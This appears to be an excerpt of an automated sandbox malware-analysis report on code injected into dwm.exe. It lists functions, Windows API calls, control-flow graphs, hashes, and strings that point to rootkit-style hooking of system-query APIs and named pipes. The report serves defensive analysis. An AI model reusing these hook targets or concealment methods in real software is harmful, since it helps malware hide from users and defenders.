                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: D5610172B016D08BDB54DF19940873DB3B2FB64BA4F688521DE9D07788DB38D852C721
                                                              Function 000002BAAEDB1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 000002BAAEDB1628: GetProcessHeap.KERNEL32 ref: 000002BAAEDB1633
                                                                • Part of subcall function 000002BAAEDB1628: HeapAlloc.KERNEL32 ref: 000002BAAEDB1642
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB16B2
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB16DF
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB16F9
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1719
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1734
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1754
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB176F
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB178F
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB17AA
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB17CA
                                                              • Sleep.KERNEL32 ref: 000002BAAEDB1AD7
                                                              • SleepEx.KERNELBASE ref: 000002BAAEDB1ADD
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB17E5
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1805
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1820
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1840
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB185B
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB187B
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1896
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB18A0
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: 5897a26a41a4aef26239da29d92159dd846d94d21f5a3ab815abeae03d819eb0
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: 0931336131164192FF649B26DA493A933F4EB85BC0F3454299E8D877D5FF24C851C237

                                                              Non-executed Functions

                                                              Function 000002BAAEDB2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 573 2baaedb2b2c-2baaedb2ba5 call 2baaedd2ce0 576 2baaedb2bab-2baaedb2bb1 573->576 577 2baaedb2ee0-2baaedb2f03 573->577 576->577 578 2baaedb2bb7-2baaedb2bba 576->578 578->577 579 2baaedb2bc0-2baaedb2bc3 578->579 579->577 580 2baaedb2bc9-2baaedb2bd9 GetModuleHandleA 579->580 581 2baaedb2bed 580->581 582 2baaedb2bdb-2baaedb2beb call 2baaedc6090 580->582 584 2baaedb2bf0-2baaedb2c0e 581->584 582->584 584->577 587 2baaedb2c14-2baaedb2c33 StrCmpNIW 584->587 587->577 588 2baaedb2c39-2baaedb2c3d 587->588 588->577 589 2baaedb2c43-2baaedb2c4d 588->589 589->577 590 2baaedb2c53-2baaedb2c5a 589->590 590->577 591 2baaedb2c60-2baaedb2c73 590->591 592 2baaedb2c75-2baaedb2c81 591->592 593 2baaedb2c83 591->593 594 2baaedb2c86-2baaedb2c8a 592->594 593->594 595 2baaedb2c8c-2baaedb2c98 594->595 596 2baaedb2c9a 594->596 597 2baaedb2c9d-2baaedb2ca7 595->597 596->597 598 2baaedb2d9d-2baaedb2da1 597->598 599 2baaedb2cad-2baaedb2cb0 597->599 600 2baaedb2ed2-2baaedb2eda 598->600 601 2baaedb2da7-2baaedb2daa 598->601 602 2baaedb2cc2-2baaedb2ccc 599->602 603 2baaedb2cb2-2baaedb2cbf call 2baaedb199c 599->603 600->577 600->591 606 2baaedb2dac-2baaedb2db8 call 2baaedb199c 601->606 607 2baaedb2dbb-2baaedb2dc5 601->607 604 2baaedb2d00-2baaedb2d0a 602->604 605 2baaedb2cce-2baaedb2cdb 602->605 603->602 611 2baaedb2d0c-2baaedb2d19 604->611 612 2baaedb2d3a-2baaedb2d3d 604->612 605->604 610 2baaedb2cdd-2baaedb2cea 605->610 606->607 614 2baaedb2df5-2baaedb2df8 607->614 615 2baaedb2dc7-2baaedb2dd4 607->615 618 2baaedb2ced-2baaedb2cf3 610->618 611->612 619 2baaedb2d1b-2baaedb2d28 611->619 620 2baaedb2d4b-2baaedb2d58 lstrlenW 612->620 621 2baaedb2d3f-2baaedb2d49 call 2baaedb1bbc 612->621 616 2baaedb2e05-2baaedb2e12 lstrlenW 614->616 617 2baaedb2dfa-2baaedb2e03 call 2baaedb1bbc 614->617 615->614 623 2baaedb2dd6-2baaedb2de3 615->623 630 2baaedb2e35-2baaedb2e3f call 2baaedb3844 616->630 631 2baaedb2e14-2baaedb2e1e 616->631 617->616 635 2baaedb2e4a-2baaedb2e55 617->635 628 2baaedb2d93-2baaedb2d98 618->628 629 2baaedb2cf9-2baaedb2cfe 618->629 632 2baaedb2d2b-2baaedb2d31 619->632 624 2baaedb2d7b-2baaedb2d8d call 2baaedb3844 620->624 625 2baaedb2d5a-2baaedb2d64 620->625 621->620 621->628 626 2baaedb2de6-2baaedb2dec 623->626 624->628 639 2baaedb2e42-2baaedb2e44 624->639 625->624 634 2baaedb2d66-2baaedb2d79 call 2baaedb152c 625->634 626->635 636 2baaedb2dee-2baaedb2df3 626->636 628->639 629->604 629->618 630->639 631->630 640 2baaedb2e20-2baaedb2e33 call 2baaedb152c 631->640 632->628 641 2baaedb2d33-2baaedb2d38 632->641 634->624 634->628 644 2baaedb2e57-2baaedb2e5b 635->644 645 2baaedb2ecc-2baaedb2ed0 635->645 636->614 636->626 639->600 639->635 640->630 640->635 641->612 641->632 650 2baaedb2e63-2baaedb2e7d call 2baaedb85c0 644->650 651 2baaedb2e5d-2baaedb2e61 644->651 645->600 654 2baaedb2e80-2baaedb2e83 650->654 651->650 651->654 657 2baaedb2e85-2baaedb2ea3 call 2baaedb85c0 654->657 658 2baaedb2ea6-2baaedb2ea9 654->658 657->658 658->645 660 2baaedb2eab-2baaedb2ec9 call 2baaedb85c0 658->660 660->645
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: a276db4f4c99bc7a332c3aa6f38ea54ad7e67eb6164bf7f066872a3ece57c91a
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 7FB1AF23220A5082FBA59F2AD4487AD73B5F784F94F645016EE8D93798EF35CC40C7A2
                                                              Function 000002BAAEDB7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: de49e428489568a9a1c1efdf934af856d60b8aa7fbf2d7bd99ae0cf3bd723102
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 68315E72215B808AEB609F70E8847ED7374F784744F54452ADB8E57B98EF38C648C721
                                                              Function 000002BAAEDBD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: fb6e2855a87a0ff13252f3cfd112d920f0755c5f39388b13f5746e8061f6324b
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: B6316036214F8086EB60CF25E8443AE73B4F789B98F640126EADD57B99EF38C545CB11
                                                              Function 000002BAAEDB12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: 021fd72a2c85c48f49af8c87edb02117a9eaee4286e2f1a353b9e8475e37f6ea
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 3E514A76200B848AEB55CF62E54839AB7B1F789FD9F244124DA9E07758EF3CC049CB11
                                                              Function 000002BAAEDB1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: 5209b30d384ed27263cef4efd0be4bd3ee72a5dd7a678bd2366918c1dfa3fcbd
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 8A31D265601A4AA0FA02EFAEEC997E47331B788388FB00413E4DD12575AF38865DC372
                                                              Function 000002BAAED86910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 415 2baaed86910-2baaed86916 416 2baaed86918-2baaed8691b 415->416 417 2baaed86951-2baaed8695b 415->417 419 2baaed86945-2baaed86984 call 2baaed86fc0 416->419 420 2baaed8691d-2baaed86920 416->420 418 2baaed86a78-2baaed86a8d 417->418 424 2baaed86a9c-2baaed86ab6 call 2baaed86e54 418->424 425 2baaed86a8f 418->425 437 2baaed86a52 419->437 438 2baaed8698a-2baaed8699f call 2baaed86e54 419->438 422 2baaed86922-2baaed86925 420->422 423 2baaed86938 __scrt_dllmain_crt_thread_attach 420->423 428 2baaed86927-2baaed86930 422->428 429 2baaed86931-2baaed86936 call 2baaed86f04 422->429 426 2baaed8693d-2baaed86944 423->426 435 2baaed86ab8-2baaed86aed call 2baaed86f7c call 2baaed86e1c call 2baaed87318 call 2baaed87130 call 2baaed87154 call 2baaed86fac 424->435 436 2baaed86aef-2baaed86b20 call 2baaed87190 424->436 430 2baaed86a91-2baaed86a9b 425->430 429->426 435->430 447 2baaed86b22-2baaed86b28 436->447 448 2baaed86b31-2baaed86b37 436->448 441 2baaed86a54-2baaed86a69 437->441 450 2baaed869a5-2baaed869b6 call 2baaed86ec4 438->450 451 2baaed86a6a-2baaed86a77 call 2baaed87190 438->451 447->448 452 2baaed86b2a-2baaed86b2c 447->452 453 2baaed86b39-2baaed86b43 448->453 454 2baaed86b7e-2baaed86b94 call 2baaed8268c 448->454 468 2baaed86a07-2baaed86a11 call 2baaed87130 450->468 469 2baaed869b8-2baaed869dc call 2baaed872dc call 2baaed86e0c call 2baaed86e38 call 2baaed8ac0c 450->469 451->418 458 2baaed86c1f-2baaed86c2c 452->458 459 2baaed86b45-2baaed86b4d 453->459 460 2baaed86b4f-2baaed86b5d call 2baaed95780 453->460 476 2baaed86b96-2baaed86b98 454->476 477 2baaed86bcc-2baaed86bce 454->477 465 2baaed86b63-2baaed86b78 call 2baaed86910 459->465 460->465 480 2baaed86c15-2baaed86c1d 460->480 465->454 465->480 468->437 490 2baaed86a13-2baaed86a1f call 2baaed87180 468->490 469->468 518 2baaed869de-2baaed869e5 __scrt_dllmain_after_initialize_c 469->518 476->477 485 2baaed86b9a-2baaed86bbc call 2baaed8268c call 2baaed86a78 476->485 478 2baaed86bd5-2baaed86bea call 2baaed86910 477->478 479 2baaed86bd0-2baaed86bd3 477->479 478->480 499 2baaed86bec-2baaed86bf6 478->499 479->478 479->480 480->458 485->477 511 2baaed86bbe-2baaed86bc6 call 2baaed95780 485->511 507 2baaed86a45-2baaed86a50 490->507 508 2baaed86a21-2baaed86a2b call 2baaed87098 490->508 504 2baaed86bf8-2baaed86bff 499->504 505 2baaed86c01-2baaed86c11 call 2baaed95780 499->505 504->480 505->480 507->441 508->507 517 2baaed86a2d-2baaed86a3b 508->517 511->477 517->507 518->468 519 2baaed869e7-2baaed86a04 call 2baaed8abc8 518->519 519->468
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 3a3445b5c5b7236f1e9901a80e3d34463ef94fa3386ea108bbdd2f2539c2dc99
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: AE81E1216002C18AFA50AB65984D37933B0FB85BA0F7485259AED877D6EB39C945C733
                                                              Function 000002BAAEDBCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 000002BAAEDBCE37
                                                              • FlsGetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCEBC
                                                              • SetLastError.KERNEL32 ref: 000002BAAEDBCED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,000002BAAEDBECCC,?,?,?,?,000002BAAEDBBF9F,?,?,?,?,?,000002BAAEDB7AB0), ref: 000002BAAEDBCF2C
                                                                • Part of subcall function 000002BAAEDBD6CC: HeapAlloc.KERNEL32 ref: 000002BAAEDBD721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCF54
                                                                • Part of subcall function 000002BAAEDBD744: HeapFree.KERNEL32 ref: 000002BAAEDBD75A
                                                                • Part of subcall function 000002BAAEDBD744: GetLastError.KERNEL32 ref: 000002BAAEDBD764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCF76
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: d27bcd3e3be06ac23451f81ac6a3d7446f6fead1fd5b5113facc878efb065f1d
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 8241762030224486FA686775599D37D3371AB457B4F344728E8BE8A6D6FF28C401C633
                                                              Function 000002BAAEDB2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: 9fafb785bd32f33501c11e8a0f52c5083696a88c54c8535996ee574ab5fa00e8
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 1B212936614B40C2FB108B25F54836A77B1F789BE5F604215EAAD03BA8DF7CC549CB12
                                                              Function 000002BAAEDBA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: 7037e6799ea039a80316b5bf6abe8f5fcbb70f7b4837cb3c52c8002aac337661
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: E8E1A072A04B808AFB60DF69D48839D77B4F745B98F600116EECD5BB99EB34C481C722
                                                              Function 000002BAAED89944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction ID: bc0b542717c820ff85c66551c43a1f08ca029532d89f3d82a19b61928358f9aa
                                                              • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction Fuzzy Hash: 08E1AD72604BC08AEB60DF65D4883AD7BB0F785B98F601115EECE57B9ACB34C491C722
                                                              Function 000002BAAEDBF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: 7aa3b17e0f84c3e0a82991023fe1872ea8ae28538d350a5975d3f8b2dd5b6dae
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 0841B422311A0099FA26DB66AC1875633B5F749BE0F2941299D9EDB785FF38C445C322
                                                              Function 000002BAAEDB104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: ac8edeaf9f333444c00d7dcb691828d364d69370516c50b64d570df9f7ba271d
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: 40415C72214B84CAE760CF61E44879A77B1F389BD9F148129DB8D07B98EF38C849CB11
                                                              Function 000002BAAEDBD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD087
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: 7b8f3d39a7cc5a5752335c3534f39bb3473116ee2bae33ebf294a1756d483ae8
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: F611C82070124442FA686735999E37973759B457F4F344729E8BD4B7DAFF28C402C623
                                                              Function 000002BAAEDB7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: df669eb044ea75eff741ac9df925540f01fab92edf335e8996395a79b8f9ed29
